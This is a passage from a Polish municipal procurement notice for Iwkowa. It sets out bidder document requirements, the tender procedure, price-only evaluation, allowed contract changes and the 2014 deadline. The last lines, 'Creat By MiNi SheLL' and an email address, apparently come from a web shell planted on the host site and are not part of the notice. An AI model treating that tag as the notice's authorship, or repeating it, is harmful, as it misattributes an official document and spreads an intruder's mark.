                                      podstawie art. 24 ust. 1 ustawy Pzp, dotyczące Wykonawców wspólnie 
                                     ubiegających się o udzielenie zamówienia, winien złożyć każdy z Wykonawców 
                                     wspólnie ubiegających się o zamówienie,
                                  -  informację o przynależności do tej samej grupy kapitałowej, o której mowa            
                                     w art. 24 ust.  2 pkt 5 ustawy Pzp składa każdy z Wykonawców wspólnie 
                                     ubiegających się o udzielenie zamówienia.
4.     Pisemne zobowiązanie podmiotów zgodnie z art. 26 ust. 2b ustawy Pzp  
w przypadku gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych (jeśli  dotyczy)  innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi   do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne                     zobowiązanie tych podmiotów (oryginał) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
5. Wykonawca oświadczy, że spełnia warunki określone w art. 22 ust. 1 ustawy Pzp   oraz oświadczy, że nie podlega wykluczeniu z postępowania na podstawie art. 24           ust. 1  ustawy Pzp.

6. Zgodnie z art. 26 ust. 2 ustawy Pzp Wykonawca załączy dokumenty wymienione           w § 1 ust. 1 pkt  3, 7, 8,  § 1 ust. 2, ust 3 , § 3 ust. 1 pkt 1, 2, 3, 4, 5, 6 ,7,  § 3 ust. 3, 
 § 4, § 7 oraz  § 9 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z  2013 roku, poz. 231), oraz spełnią wymogi art. 26 ust. 2a, 2b, 2d ustawy Pzp.
7. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca               ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w § 4 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r.                     w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013r., poz. 231), 
zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy,  złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Przepis 
       § 4 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r.                       
       w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, 
       oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013r., poz. 231) 
       stosuje się odpowiednio.
8. W przypadku  wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne postanowienia do umowy zawiera wzór umowy, stanowiący załącznik Nr 11 do SIWZ, tj:

1.	Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane jedynie w formie pisemnej              w postaci aneksu do umowy podpisanego przez obydwie strony, pod rygorem nieważności.
2.	Dopuszcza się możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty,             na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej                  z okoliczności wymienionych poniżej, w zakresie: 
2.1.	 Zmiany terminu realizacji przedmiotu umowy: 
a)	przypadki losowe (kataklizmy lub inne czynniki zewnętrzne, niemożliwe do przewidzenia wydarzenia, którym nie można zapobiec), które będą miały wpływ na treść zawartej umowy           i termin realizacji zamówienia,
b)	zmiany przepisów powodujących konieczność innych rozwiązań niż zakładano w opisie przedmiotu zamówienia,
c)	zmiany przepisów powodujących konieczność uzyskania dokumentów, które te przepisy              narzucają,
d)	gdy organy i instytucje uzgadniające nie wydały uzgodnień w ustawowym terminie, 
e)	w przypadku konieczności dokonania korekt w zatwierdzonym przez Zamawiającego                rozwiązaniu projektowym, a wynikających ze zmiany stanowiska Zamawiającego lub stanowiska instytucji uzgadniających (opiniujących).
f)	możliwość wydłużenia terminów określonych w § 2 pkt. 2  niniejszej   umowy w przypadku  konieczności przeprowadzenia postępowań odwoławczych na etapie prowadzonych               (w ramach zamówienia) postępowań administracyjnych (wszelkich) . W takich przypadkach możliwe będzie wydłużenie w/w terminów max. o czas trwania postępowań odwoławczych.
2.2.	  Zmiany osobowe:
a)	zmiana osób realizujących zamówienie pod warunkiem, że osoby te będą spełniały                            wymagania określone w SIWZ,
b)	zmiana osób odpowiedzialnych za prawidłowe świadczenie usług ze strony Wykonawcy                     i osób wyznaczonych do współpracy w imieniu Zamawiającego, 
c)	zmiana podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot umowy,
d)	rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy,                o ile posłużenie się podwykonawcą doprowadzi np. do skrócenia terminu wykonania przedmiotu umowy, zmniejszenia należnego Wykonawcy wynagrodzenia.
2.3. Pozostałe zmiany: 
a)	w przypadku urzędowej zmiany wysokości stawki podatku VAT, dopuszcza się możliwość                sporządzenia aneksu do umowy uwzględniającego zmianę wynagrodzenia umownego wynikająca z tego tytułu,
b)	zmiany procentowej wysokości płatności faktur częściowych,
c)	zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy,
d)	zmiana wysokości środków finansowych przeznaczonych na realizację przedmiotowego zamówienia  w poszczególnych latach,
e)	ograniczenie zakresu rzeczowego zamówienia objętego niniejszym zamówieniem, na etapie realizacji zamówienia. W takim wypadku wynagrodzenie zostanie pomniejszone w sposób proporcjonalny do pierwotnego zakresu zamówienia. Ograniczenie zakresu może być wynikiem braku możliwości zaprojektowania sieci kanalizacyjnej z przyczyn technicznych lub formalnych              oraz w przypadku gdy Zamawiający zamierza ograniczyć zakres w każdym przypadku. Z tego tytułu Wykonawcy nie przysługuje żadne roszczenie odszkodowania.
f)	obniżenie wynagrodzenia Wykonawcy w przypadku rezygnacji praz Zamawiającego  z realizacji 
  części przedmiotu umowy. W takim przypadku Zamawiający zapłaci za wszystkie spełnione 
  świadczenia i udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi             
  z umowy planowanymi świadczeniami,
g)	w każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.iwkowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Iwkowej,  32-861  Iwkowa 468.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.01.2014 godzina 10:30, miejsce: Urząd Gminy w Iwkowej,  32-861  Iwkowa 468,  sekretariat -  pokój  nr  22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com